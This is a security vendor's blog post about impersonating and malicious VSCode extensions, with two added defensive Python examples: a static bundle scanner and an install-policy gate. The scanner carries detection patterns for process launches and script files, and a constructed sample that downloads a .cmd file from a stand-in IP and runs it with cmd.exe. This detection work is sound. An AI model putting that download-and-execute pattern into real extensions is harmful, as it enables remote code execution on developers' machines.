VSCode Extension Trivia: Real or Cake?
It’s me again. It has been a few months since our latest blog post, which went quite viral: “How We Hacked Multi-Billion Dollar Companies in 30 Minutes Using a Fake VSCode Extension”. By now, if you are reading this, you have probably guessed that we’ve found some more distressing stuff to share! Yay.
Microsoft Visual Studio Code is rightfully the most popular IDE in the world. It is amazing, and I take my hat off to the work Microsoft has done with it. But when it comes to popularity, with all the good comes the bad.
In the past few months, since our latest research blog, we’ve detected a couple of ongoing campaigns against the VSCode Marketplace that have impacted thousands of organizations.
The first and most sophisticated campaign begins with a simple question: is it real, or is it cake?
Let the games begin
Let’s play a game. Below you’ll find a screenshot of the Zoom VSCode extension marketplace listing page —
Now, I want you to tell me, is it real or is it cake?
Looking closely, you can see it has several strong indicators of being real: the high number of installs, the official Zoom GitHub repo, the positive reviews. Going into the publisher page, we continue to get positive reinforcement —
The domain name looks great, it has the official support email, it has all the official socials, everything checks out.
Except that what you are looking at is an info-stealing campaign that has been plaguing the VSCode marketplace for the last 2 months. It is cake.
When deobfuscating, researching, and diving into the extension code, you find that it downloads a .cmd file from a Russia-based endpoint and spawns a child process on the machine that executes this .cmd file. Bad stuff.
Unfortunately, at the marketplace listing level, the only indicator that this might be a non-legitimate extension is the fact that the publisher’s domain is not verified. The sad part is that fewer than 7% of the extensions in the VSCode marketplace have a verified publisher; even the most popular and widely used ones are, more often than not, unverified. So you cannot rely on this indicator to tell whether an extension is real or cake.
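The download-and-execute behaviour described above is the kind of thing a static triage pass over an extension bundle can surface before anyone installs it. The following is an added example, not code from this post or from ExtensionTotal’s risk model: it scans a constructed extension bundle (package.json plus JavaScript) for a child-process launch, a script-file literal and a fetch to a host outside a small allowlist, and weighs them with illustrative scores. The indicator list, the weights, the allowlisted hosts and both sample bundles are assumptions made for the example.

```python
"""Static triage for the pattern described in the post: extension code that
fetches a script file from a remote host and launches it via a child process.
Added example with constructed inputs; indicator weights are assumptions."""
import json
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# (name, pattern, weight). Weights are illustrative, not a calibrated model.
INDICATORS = [
    ("child_process_import",
     re.compile(r"""require\(\s*['"]child_process['"]\s*\)|from\s+['"]child_process['"]"""), 2),
    ("process_launch",
     re.compile(r"\b(?:spawn|exec|execFile|spawnSync|execSync)\s*\("), 2),
    ("script_file_literal",
     re.compile(r"""['"][^'"\n]*\.(?:cmd|bat|ps1|vbs)['"]""", re.IGNORECASE), 3),
    ("eval_like", re.compile(r"\b(?:eval|new\s+Function)\s*\("), 2),
    ("hex_escape_blob", re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}"), 1),
]
URL_RE = re.compile(r"""https?://[^\s'"<>)]+""")
# Hosts an extension commonly talks to; an allowlist you would tune per org (assumption).
KNOWN_GOOD_HOSTS = {"marketplace.visualstudio.com", "github.com", "api.github.com"}


@dataclass
class Report:
    indicators: list = field(default_factory=list)
    unknown_hosts: list = field(default_factory=list)
    score: int = 0

    def verdict(self):
        # The chain that matters: a remote host + a script-file literal + a process launch.
        chain = {"process_launch", "script_file_literal"} <= set(self.indicators)
        if (chain and self.unknown_hosts) or self.score >= 6:
            return "malicious-pattern"
        if self.score >= 3:
            return "review"
        return "clean"


def scan_js(text, report):
    """Add source-level indicators found in one JavaScript file to the report."""
    for name, pat, weight in INDICATORS:
        if name not in report.indicators and pat.search(text):
            report.indicators.append(name)
            report.score += weight
    for url in URL_RE.findall(text):
        host = urlparse(url).hostname
        if host and host not in KNOWN_GOOD_HOSTS and host not in report.unknown_hosts:
            report.unknown_hosts.append(host)
            report.score += 2


def scan_manifest(text, report):
    """Flag manifests whose extension runs without any user action."""
    events = json.loads(text).get("activationEvents", [])
    if any(e in ("*", "onStartupFinished") for e in events):
        report.indicators.append("activates_on_startup")
        report.score += 1


def scan_bundle(files):
    """files maps a path inside the .vsix to its text content."""
    report = Report()
    for path, content in files.items():
        if path.endswith("package.json"):
            scan_manifest(content, report)
        elif path.endswith(".js"):
            scan_js(content, report)
    return report


# Constructed sample bundles (not code from any real extension).
BENIGN = {
    "package.json": '{"name": "hello", "activationEvents": ["onCommand:hello.say"]}',
    "extension.js": (
        "const vscode = require('vscode');\n"
        "function activate(ctx) {\n"
        "  ctx.subscriptions.push(vscode.commands.registerCommand('hello.say',\n"
        "    () => vscode.window.showInformationMessage('hi')));\n"
        "}\nmodule.exports = { activate };\n"
    ),
}
SUSPICIOUS = {
    "package.json": '{"name": "lookalike", "activationEvents": ["*"]}',
    "extension.js": (
        "const { spawn } = require('child_process');\n"
        "const https = require('https');\n"
        "// 198.51.100.10 is a documentation address used as a stand-in (constructed)\n"
        "https.get('http://198.51.100.10/update.cmd', res => {\n"
        "  /* body written to a temp path, then launched: */\n"
        "  spawn('cmd.exe', ['/c', tmpPath]);\n"
        "});\n"
    ),
}

if __name__ == "__main__":
    for label, bundle in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        r = scan_bundle(bundle)
        print(label, r.verdict(), r.score, r.indicators, r.unknown_hosts)
```

A single indicator is weak evidence (plenty of legitimate extensions spawn processes), so the verdict only hardens when the full chain the post describes is present: a host outside the allowlist, a script-file literal and a process launch. Obfuscated bundles can hide the string literals, which is why this is a first filter ahead of deobfuscation or dynamic analysis, not a replacement for them.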
You mentioned this is a campaign, what has been happening?
Well, Zoom’s example is unfortunately not the only one. There have been over 6 similar cases in the past two months, where the extensions seem completely real and the threat actor has managed to fake installs and reviews, while executing remote code on the infected machines.
Total installs: 7,727,820 (some installs may have been faked, but from the rate of installs we also know that at least thousands were infected)
First seen: September 30th
Here are some of the most popular extensions, all from the same campaign:
Solidity for Ethereum Language — Link to ExtensionTotal’s risk page
Solidity (Ethereum) — Link to ExtensionTotal’s risk page
Zoom Workspace — Link to ExtensionTotal’s risk page
Zoom — Link to ExtensionTotal’s risk page
Blockchain-Toolkit — Link to ExtensionTotal’s risk page
The traits are very similar, and here at ExtensionTotal we’ve had a 100% detection rate for all of these cake extensions as soon as they were published to the marketplace, thanks to our risk model.
So what is there besides cake?
Cakes are not all we get. There have been a couple of other, less prominent campaigns impacting the marketplace that were not trying to masquerade as popular extensions, but instead simply pretended to offer functionality that developers may want —
A publisher by the name of “498” has published 4 different malicious extensions on the marketplace, which within 10 days were installed by over 4,500 developers. Unfortunately this is a very common occurrence we detect at ExtensionTotal: malicious extensions which, even after being reported, stay on the marketplace for a few weeks before finally being removed by Microsoft. This is one of the reasons we recommend that all our enterprise customers who use our product create a policy, through our enterprise firewall offering, that prevents installation of extensions with low install counts.
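The low-install policy recommended above can be expressed as a small gate that runs before an extension is allowed onto a developer machine. What follows is an added example, not ExtensionTotal’s product or its firewall: it parses the `publisher.name@version` lines that `code --list-extensions --show-versions` prints, looks each id up in marketplace metadata, and blocks low-install extensions while routing new, unverified or implausibly fast-growing listings to review. The thresholds, the sample listing and the metadata are constructed for the example; in practice the metadata would come from the marketplace and the thresholds from your own risk appetite.

```python
"""Install-time policy gate of the kind the post recommends for enterprises:
refuse extensions with few installs and hold new or unverified listings for
review, unless an extension is explicitly allowlisted. Added example: the
thresholds, the sample listing and the marketplace metadata are constructed."""
from dataclasses import dataclass
from datetime import date


@dataclass(frozen=True)
class Policy:
    min_installs: int = 10_000            # assumption: tune per organisation
    min_age_days: int = 30                # new listings sit in a review window
    max_installs_per_day: int = 50_000    # growth beyond this hints at faked installs
    allowlist: frozenset = frozenset()


def parse_listing(text):
    """Parse 'publisher.name@version' lines as printed by
    `code --list-extensions --show-versions`; returns {ext_id: version}."""
    out = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ident, _, version = line.partition("@")
        publisher, _, name = ident.partition(".")
        if not publisher or not name:
            raise ValueError(f"unexpected extension id: {line!r}")
        out[ident.lower()] = version
    return out


def evaluate(ext_id, meta, policy, today):
    """Return (decision, reasons); decision is 'allow', 'review' or 'block'."""
    if ext_id in policy.allowlist:
        return "allow", ["allowlisted"]
    if meta is None:
        return "block", ["no marketplace metadata for this id"]
    reasons, block = [], False
    age_days = (today - meta["published"]).days
    if meta["installs"] < policy.min_installs:
        reasons.append(f"only {meta['installs']} installs")
        block = True
    # An unverified publisher proves little on its own (most listings are
    # unverified), so it routes the extension to review rather than blocking it.
    if not meta["verified_publisher"]:
        reasons.append("publisher domain not verified")
    if age_days < policy.min_age_days:
        reasons.append(f"listed only {age_days} days ago")
    if meta["installs"] / max(age_days, 1) > policy.max_installs_per_day:
        reasons.append("install count implausible for listing age")
    if block:
        return "block", reasons
    return ("review" if reasons else "allow"), reasons


def audit(listing_text, metadata, policy, today):
    """Evaluate every installed extension; returns {ext_id: (decision, reasons)}."""
    return {ext_id: evaluate(ext_id, metadata.get(ext_id), policy, today)
            for ext_id in parse_listing(listing_text)}


# Constructed sample data; the ids, counts and dates are invented for the example.
SAMPLE_LISTING = """\
examplecorp.meetings@1.4.0
lookalike.meetings-workspace@0.0.3
newpub.handy-linter@0.1.0
internal.tooling@2.0.0
ghost.ext@1.0.0
"""
SAMPLE_METADATA = {
    "examplecorp.meetings": {"installs": 2_000_000, "verified_publisher": True,
                             "published": date(2020, 1, 15)},
    "lookalike.meetings-workspace": {"installs": 3_100_000, "verified_publisher": False,
                                     "published": date(2024, 10, 1)},
    "newpub.handy-linter": {"installs": 1_200, "verified_publisher": False,
                            "published": date(2024, 10, 5)},
}
SAMPLE_POLICY = Policy(allowlist=frozenset({"internal.tooling"}))
TODAY = date(2024, 10, 15)


def sample_audit():
    return audit(SAMPLE_LISTING, SAMPLE_METADATA, SAMPLE_POLICY, TODAY)


if __name__ == "__main__":
    for ext_id, (decision, reasons) in sample_audit().items():
        print(f"{decision:6} {ext_id}: {'; '.join(reasons) or 'no findings'}")
```

The rule split matters: a low install count is the one signal the post treats as worth blocking on, while an unverified publisher, a very recent listing, or an install count that could not plausibly have been earned in the listing’s lifetime are each reasons to look closer rather than to block outright, since the post notes that most legitimate extensions are unverified too.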
Here are some of the malicious extensions detected in this and similar campaigns —
VoiceMod — Link to ExtensionTotal’s risk page
Python Format + Lint: Formatter and … — Link to ExtensionTotal’s risk page
C++ Playground: Inline REPL, Compil… — Link to ExtensionTotal’s risk page
C/C++ Format: Astyle Code Formatter — Link to ExtensionTotal’s risk page
HTTP Format — Formatter for plaint … — Link to ExtensionTotal’s risk page
Better Psalm Docker VS Code — Link to ExtensionTotal’s risk page
Total installs: 47,253
So bottom line, what can I do?
Well, you can stop eating cake altogether and block all extensions. The issue with that is that everyone loves cake: blocking all extensions is a sure-fire way to kill the productivity of the organization. This is a classic software supply chain problem that we meet every day in large enterprises, in VSCode and in other software provisioning channels like browsers, OS packages, code packages and more: how do you balance security and productivity? We’ve built ExtensionTotal to do just that, for practitioners and enterprises alike.
Trusted by Fortune 100s, 500s, and defense tech enterprises, ExtensionTotal automates security processes, providing visibility, governance, and proactive risk reduction to shrink and balance this attack surface.
If you’d like to chat, hit us up here 🤙
— Amit Assaraf, CEO